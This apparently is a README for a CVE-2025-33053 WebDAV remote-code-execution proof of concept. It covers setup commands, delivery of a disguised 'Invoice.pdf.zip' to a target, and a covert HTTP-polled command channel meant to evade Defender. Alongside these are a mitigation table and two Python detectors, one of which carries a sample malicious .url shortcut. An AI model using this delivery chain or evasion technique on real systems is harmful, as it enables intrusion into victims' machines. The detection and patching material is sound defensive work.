## https://sploitus.com/exploit?id=B8F6B314-8028-5568-A2A7-4AA3A6141AFF
# CVE-2025-33053 - WebDAV Remote Code Execution (RCE) PoC & C2 Simulation

> **⚠️ Educational Purposes Only**
> This project demonstrates a proof-of-concept exploiting WebDAV and `.url` file delivery to achieve realistic remote code execution. It includes a decoy-based executable and a controlled simulation of command-and-control (C2) capabilities. No malicious payloads are shared.

---

## 📜 Summary

This repository contains a PoC for **CVE-2025-33053**, a vulnerability in the Windows WebDAV client path handling: a `.url` shortcut can point a trusted Windows program's working directory at a remote WebDAV share, so a helper executable that program launches by bare name is resolved from the attacker's share instead of `System32`. The PoC demonstrates how an attacker could:

* Deliver a `.url` shortcut via ZIP (`Invoice.pdf.zip`)
* Trigger execution of a payload hosted on a WebDAV container
* Open a benign-looking PDF while executing malicious logic in the background
* Optionally simulate C2 behavior (e.g., creating folders)

> The actual C2 code is **not included**; only a demonstration video is provided.

---

## 🎬 Demo Videos

### 🔹 Video 1: Decoy Execution
https://github.com/user-attachments/assets/27ada7f9-9b02-4281-b002-da7afcdffe21

Shows the `.url` file triggering `route.exe`, which opens a fake PDF and displays a popup:

> *"Execution complete. No alerts triggered. You may continue pretending you're safe."*

### 🔹 Video 2: C2 Simulation

https://github.com/user-attachments/assets/d3908eb7-3126-4ec1-ae60-a0373b877a50

A very simple command-and-control mechanism. It simulates a stealthy C2 by executing remote commands (e.g., creating a folder and launching calc) fetched via HTTP: no shell, no noise, just silent control.
Reverse shells get caught and stopped by Microsoft Defender, so instead I edit a file that the victim machine can reach over HTTP; the custom `route.exe` fetches it, strips the content and executes it.

> ✅ Videos available in the `demo/` directory.

---

## 📂 File Structure

```
CVE-2025-33053/
├── docker-compose.yml              # WebDAV container config
├── setup_webdav_payload.py         # Automates setup + zipping
├── Important-Document.pdf.zip      # Contains the disguised .url (created by the script)
├── webdav_data/                    # (created by the script)
│   └── data/payload/route.exe      # Payload (PDF + logic)
├── cleanup.sh                      # Docker + directories + webdav_data cleaner
├── demo/
│   ├── 1_decoy_execution.mp4
│   └── 2_c2_simulation.mp4
```

---

## 🧪 Running the PoC

1. **Clone the repo & navigate to it**

```bash
git clone https://github.com/kra1t0/CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept.git
cd CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept
```

2. **Run setup script**

```bash
python3 setup_webdav_payload.py
```

> This sets up the Docker WebDAV container, creates the folders, moves `pwned.exe` into the share, generates the `.url`, and packages the `.zip`.

3. **Deliver the ZIP and open on target**

* `Invoice.pdf.zip` → the user opens/unzips it and double-clicks the `.url`
* Execution begins from the WebDAV share without any warnings
(occasionally Microsoft Defender does alert that the file should be scanned by an administrator)

---
## 🧱 Affected Versions

CVE-2025-33053 affects the following Windows versions:

* Windows 10 (1809 – 22H2)
* Windows 11 (21H2 – 23H2)
* Windows Server 2016 / 2019 / 2022

Exploitation additionally requires:

* the WebClient service enabled (on client SKUs it is trigger-started the moment a WebDAV path is accessed, so "Manual" is not a mitigation)
* `.url` files not being blocked or sanitized by the mail gateway or endpoint policy

The list above is this README's summary; the MSRC advisory lists every supported Windows client and server release, so check it for your exact build.

**🛠️ The vulnerability was patched in the June 2025 cumulative updates. You can find [patch links](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053) in the Microsoft Patch Notes.**

## 🧠 How It Works

1. **The Shortcut Trick.** The `.url` file launches a trusted Windows utility (`iediagcmd.exe`) but sets its working directory to an attacker-controlled WebDAV share (`\\<host>@80\DavWWWRoot\...`), which the WebClient service mounts transparently.
2. **Executable Hijack.** That utility uses `Process.Start()` to run diagnostic tools by bare name, such as `route.exe`. The process-creation search order consults the parent's current directory before the Windows system directories, so the `route.exe` sitting on the WebDAV share runs instead of `C:\Windows\System32\route.exe`. The planted file is a plain executable, so no DLL side-loading is involved.
3. **Stealth Falcon's Delivery.** In real attacks, APT actors zipped the `.url` into misleadingly named archives (e.g. `...pdf.zip`) and hosted them on trusted domains over HTTPS. The payload chain then delivered a decoy PDF and loaded a custom C2 loader ("Horus Agent") capable of in-memory shellcode injection, process cloaking, and remote commands.
4. **Active Exploitation.** The exploit was used in March 2025 against defense organizations in the Middle East. It is high-impact (CVSS 8.8) and included in CISA's Known Exploited Vulnerabilities catalog.
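Steps 1 and 2 leave a recognisable trace in process-creation telemetry: `iediagcmd.exe` starts with its current directory on a `\\host@80\...` share, and the child it spawns has an image path on that share rather than in `System32`. The following Python is an added example, not code from this repository, that applies those three checks to Sysmon Event ID 1 (ProcessCreate) style records. The records are constructed, the host `files.example.net` is made up, and it is an assumption of the example that Sysmon reports the WebDAV UNC path as the `Image` of a process launched from the share.

```python
"""Flag process-creation records that match the CVE-2025-33053 hijack chain.

Added example, not part of the repository.  Input records use the field names
of Sysmon Event ID 1 (ProcessCreate): Image, CurrentDirectory, ParentImage.
Assumptions: the WebClient mini-redirector exposes the share as a UNC path of
the form \\host@80\DavWWWRoot\... (or host@SSL), and Sysmon records that path
as the Image of a process launched from it.
"""
import ntpath
import re

# \\host@80\..., \\host@443\..., \\host@SSL\... : the UNC form the Windows
# WebDAV client (WebClient service) uses for HTTP-backed shares.
WEBDAV_UNC = re.compile(r"^\\\\[^\\@]+@(?:ssl|\d{1,5})\\", re.IGNORECASE)

# Directories from which iediagcmd.exe's helpers (route.exe etc.) should load.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def is_webdav_unc(path: str) -> bool:
    return bool(WEBDAV_UNC.match(path))


def in_system_dir(image: str) -> bool:
    return image.lower().startswith(SYSTEM_DIRS)


def classify(event: dict) -> list:
    """Return the names of the indicators that fire for one record."""
    image = event.get("Image", "")
    cwd = event.get("CurrentDirectory", "")
    name = ntpath.basename(image).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    hits = []
    # The executable itself lives on the WebDAV share: route.exe pulled from
    # the attacker's directory instead of System32.
    if is_webdav_unc(image):
        hits.append("image_on_webdav_share")
    # The .url trick: the trusted utility starts with its CWD on the share,
    # before it has spawned anything.
    if name == "iediagcmd.exe" and is_webdav_unc(cwd):
        hits.append("iediagcmd_cwd_on_webdav")
    # Anything iediagcmd launches should come from a system directory.
    if parent == "iediagcmd.exe" and not in_system_dir(image):
        hits.append("iediagcmd_child_outside_system32")
    return hits


def triage(events: list) -> dict:
    """Map ProcessId -> fired indicators, for the records that fired any."""
    flagged = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged[ev["ProcessId"]] = hits
    return flagged


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # 1. Benign: an admin runs route.exe from a prompt.
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\route.exe",
     "CurrentDirectory": "C:\\Users\\alice\\",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    # 2. Explorer runs the .url: iediagcmd.exe starts with its CWD on WebDAV.
    {"ProcessId": 5212, "Image": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe",
     "CurrentDirectory": "\\\\files.example.net@80\\DavWWWRoot\\payload\\",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    # 3. iediagcmd.exe resolves route.exe from its CWD: the hijacked binary.
    {"ProcessId": 5240, "Image": "\\\\files.example.net@80\\DavWWWRoot\\payload\\route.exe",
     "CurrentDirectory": "\\\\files.example.net@80\\DavWWWRoot\\payload\\",
     "ParentImage": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe"},
    # 4. Benign: iediagcmd.exe run normally from a local directory.
    {"ProcessId": 6001, "Image": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe",
     "CurrentDirectory": "C:\\Windows\\System32\\",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

Record 2 fires even before the child is spawned, which is the earliest point at which the chain can be interrupted; record 3 is the hijack itself. If the share is reached over a mapped drive letter instead of a UNC path the `Image` check will miss, so the parent/child rule is kept as an independent signal.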

---

## πŸ›‘οΈ Mitigation & Defense

| Mitigation Strategy                             | Description                                                                                                               |
| ----------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **πŸ”„ Apply Microsoft Patch**                    | June 2025 cumulative updates address CVE‑2025‑33053 across Windows 10/11 and older Server versions.                       |
| **πŸ”’ Disable WebDAV Client**                    | For systems without WebDAV needs (i.e. most modern setups), disable the β€œWebClient” service via Group Policy or registry. |
| **πŸ“₯ Train Users to Avoid Suspicious Archives** | Don’t open `.url` files from ZIP/ISO emails, even if they appear document-like.                                           |
| **πŸ•΅οΈβ€β™€οΈ Monitor WebDAV Traffic**               | Look for outbound UNC connection patterns like `\\<host>@443\DavWWWRoot\...` these may indicate exploitation attempts.        |
| **πŸ›  Deploy WAF/IDS Rules**                     | Block WebDAV-related methods (e.g., `PROPFIND`) or UNC paths to untrusted domains.                                        |
| **βš™οΈ Harden Edge/SmartScreen Policies**         | Restrict handling of `.url` files and archives via browser settings or secure email gateways.                             |

> ✅ **Immediate priority**: install the patch. CISA requires federal agencies to remediate by July 1, 2025.
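The "Train Users" and "Harden Edge/SmartScreen" rows both come down to the same question a mail gateway or IR analyst has to answer: does this archive contain an Internet Shortcut whose target or working directory is remote? The following Python is an added example, not code from this repository, that answers it for a ZIP: it finds every `.url` entry (including double extensions), parses the INI-style `[InternetShortcut]` section, and reports a `URL` that launches a local file or a `WorkingDirectory` on a UNC/WebDAV/HTTP location, which is the shape of the shortcut described in "How It Works". The archive is constructed in memory; the host `files.example.net` and the `iediagcmd.exe` install path are assumptions.

```python
"""Triage a ZIP for Internet Shortcut (.url) files that point at a WebDAV share.

Added example, not code from the repository.  It lists every .url entry in an
archive (including double extensions such as Invoice.pdf.url), parses the
INI-style [InternetShortcut] section, and reports shortcuts whose URL launches
a local file or whose WorkingDirectory is a remote (UNC / WebDAV / HTTP) path.
The archive built below is constructed for the example; the host
files.example.net and the iediagcmd.exe path are assumptions.
"""
import configparser
import io
import re
import zipfile

# \\host\share (plain UNC) or \\host@80\..., \\host@SSL\... (WebDAV form).
UNC = re.compile(r"^\\\\[^\\@]+(@(?:ssl|\d{1,5}))?\\", re.IGNORECASE)
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}


def parse_url_file(data: bytes) -> dict:
    """Return the [InternetShortcut] keys of a .url file (empty if malformed)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep 'URL' / 'WorkingDirectory' as written
    try:
        cp.read_string(data.decode("utf-8-sig", errors="replace"))
    except configparser.Error:
        return {}
    return dict(cp["InternetShortcut"]) if cp.has_section("InternetShortcut") else {}


def remote_kind(path: str):
    """'webdav-unc', 'unc', 'http' or None for a WorkingDirectory value."""
    m = UNC.match(path)
    if m:
        return "webdav-unc" if m.group(1) else "unc"
    if re.match(r"https?://", path, re.IGNORECASE):
        return "http"
    return None


def assess(entry_name: str, fields: dict) -> list:
    """Indicators for one shortcut; an empty list means nothing suspicious."""
    url = fields.get("URL", "")
    cwd = fields.get("WorkingDirectory", "")
    reasons = []
    # A bookmark points at a web page; file: means "run this local program".
    if url.lower().startswith("file:"):
        reasons.append("URL launches a local file rather than a web page")
    if UNC.match(url):
        reasons.append("URL points at a UNC path")
    kind = remote_kind(cwd)
    if kind:
        reasons.append("WorkingDirectory is remote (%s): %s" % (kind, cwd))
    # Invoice.pdf.url: the shell hides .url, so the user sees a PDF.
    base = entry_name.rsplit("/", 1)[-1].lower()[: -len(".url")]
    if "." in base and base.rsplit(".", 1)[-1] in DOC_EXTS:
        reasons.append("double extension disguises the shortcut as a document")
    return reasons


def scan_zip(blob: bytes) -> dict:
    """Map each suspicious .url entry name to its list of indicators."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".url"):
                continue
            reasons = assess(info.filename, parse_url_file(zf.read(info)))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a decoy-named shortcut next to a harmless bookmark."""
    hijack = (
        "[InternetShortcut]\r\n"
        "URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe\r\n"
        "WorkingDirectory=\\\\files.example.net@80\\DavWWWRoot\\payload\r\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
        "IconIndex=1\r\n"
    )
    bookmark = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice.pdf.url", hijack)
        zf.writestr("bookmark.url", bookmark)
        zf.writestr("notes.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample_archive()).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The plain bookmark is left alone: an `https://` target in `URL` is what a legitimate shortcut looks like, so only `WorkingDirectory` is judged by its remoteness. Shortcut files written as UTF-16 are not handled here; a gateway deployment should sniff the BOM before decoding.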

---

## ❌ What’s NOT Included

* No C2 command server code
* No reverse shell scripts or malware
* No exploitation of real systems

---

## 🔗 References

* [Microsoft Patch Notes – June 2025](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053)
* [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* [Elastic Threat Report: Stealth Falcon Exploitation](https://www.elastic.co/blog/stealth-falcon-campaign-2025)
* [CERT-EU Alert](https://cert.europa.eu/article/webdav-url-hijack-apt)
* [Microsoft Defender AV & SmartScreen Advisory](https://learn.microsoft.com/en-us/microsoft-365/security/)

---

Crafted with attention to realism, red team tradecraft, and ethical disclosure by [@kra1t0](https://github.com/kra1t0)

*Precision in Chaos*